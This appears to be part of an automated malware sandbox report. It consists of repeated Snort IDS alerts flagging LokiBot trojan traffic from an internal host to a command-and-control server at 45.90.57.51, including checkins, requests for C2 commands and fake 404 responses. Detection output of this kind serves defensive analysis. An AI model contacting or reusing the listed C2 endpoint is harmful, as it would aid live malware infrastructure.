                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49735 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49735 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49735 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49735 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49735
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49736 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49736 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49736 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49736 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49736 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49736
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49737 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49737 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49737 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49737 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49737 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49737
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49738 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49738 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49738 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49738 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49738 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49738
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49739 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49739 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49739 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49739 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49739 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49739
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49740 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49740 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49740 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49740 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49740 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49740
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49742 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49742 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49742 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49742 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49742 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49742
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49743 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49743 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49743 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49743 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49743 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49743
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49744 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49744 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49744 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49744 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49744 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49744
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49745 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49745 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49745 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49745 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49745 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49745
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49746 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49746 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49746 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49746 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49746 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49746
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49747 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49747 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49747 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49747 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49747 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49747
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49748 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49748 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49748 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49748 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49748 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49748
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49749 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49749 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49749 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49749 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49749 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49749
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49750 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49750 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49750 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49750 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49750 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49750
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49751 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49751 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49751 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49751 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49751 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49751
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49752 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49752 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49752 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49752 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49752 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49752
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49753 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49753 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49753 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49753 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49753 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49753
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49755 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49755 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49755 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49755 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49755 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49755
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49756 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49756 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49756 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49756 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49756 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49756
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49757 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49757 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49757 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49757 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49757 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49757
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49758 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49758 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49758 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49758 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49758 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49758
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49759 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49759 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49759 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49759 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49759 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49759
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49760 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49760 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49760 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49760 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49760 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49760
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49761 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49761 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49761 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49761 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49761 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49761
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49762 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49762 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49762 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49762 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49762 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49762
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49763 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49763 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49763 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49763 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49763 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49763
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49764 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49764 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49764 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49764 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49764 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49764
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49765 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49765 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49765 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49765 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49765 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49765
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49766 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49766 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49766 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49766 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49766 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49766
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49767 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49767 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49767 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49767 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49767 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49767
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49768 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49768 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49768 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49768 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49768 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49768
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49769 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49769 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49769 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49769 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49769 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49769
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49770 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49770 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49770 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49770 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49770 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49770
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49771 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49771 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49771 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49771 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49771 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49771
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49772 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49772 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49772 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49772 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.5:49772 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.90.57.51:80 -> 192.168.2.5:49772
                  Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49773 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49773 -> 45.90.57.51:80
                  Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49773 -> 45.90.57.51:80
